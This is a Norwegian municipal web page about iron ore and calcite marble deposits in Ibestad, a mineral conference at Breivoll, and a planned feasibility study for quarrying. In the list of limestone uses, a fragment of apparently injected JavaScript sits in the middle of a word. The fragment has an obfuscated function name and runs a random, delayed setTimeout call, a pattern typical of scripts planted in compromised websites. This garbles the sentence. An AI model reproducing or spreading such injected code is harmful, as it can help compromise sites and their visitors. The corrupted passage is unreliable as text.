Mineraler i Ibestad

Illustrasjonen viser det aktuelle området. Foto: Ibestad kommune

Ibestad kommune har et stort uutviklet potensial innen bergverk. På Andørja er det store forekomster av jernmalm og på Rolla er det store forekomster av kalkapatmarmor. Begge ressursene er av NGU (Norges Geologiske Undersøkelser) karakterisert som ressurser av «nasjonal interesse.»

Mineralkonferanse

Ibestad kommune inviterte 15.september til mineralkonferanse på Breivoll. Det var totalt 38 påmeldte deltagere som representerte blant annet bergverksindustrien, Norges Geologiske Undersøkelser, Universitetet i Tromsø, grunneiere på Breivoll, befolkning i kommunen og kommunal administrasjon og politikere.

Konferansens hovedinnhold var gjennomgang av resultater etter gjennomførte kjerneboringer på Breivoll i 2014 og de industrielle muligheter som kan ligge i en videre utvikling av ressursene. I tillegg presenterte kommunen sin rolle som tilrettelegger for næringsutvikling, universitet deres muligheter for kunnskaps- og forskningsbasert støtte, samt at mulige finansieringsmuligheter ble belyst.

Ibestad kommune og grunneierne på Brevoll og Skog har nå gått sammen om en felles mulighetsstudie som skal belyse om det finnes realistiske alternativer for igangsetting av en kommersiell bergverksdrift for utvinning av kalkspatmarmor på Breivoll.

Kalkspatmarmor / kalkstein har en rekke anvendelsesområder:
-Hovedbestandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anddel i sement, benyttes i maling, i metallproduksjon, i glassproduksjon, i tabletter, samt mye annet.

0 replies

Legg igjen et svar

Want to join the discussion?
Feel free to contribute!

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *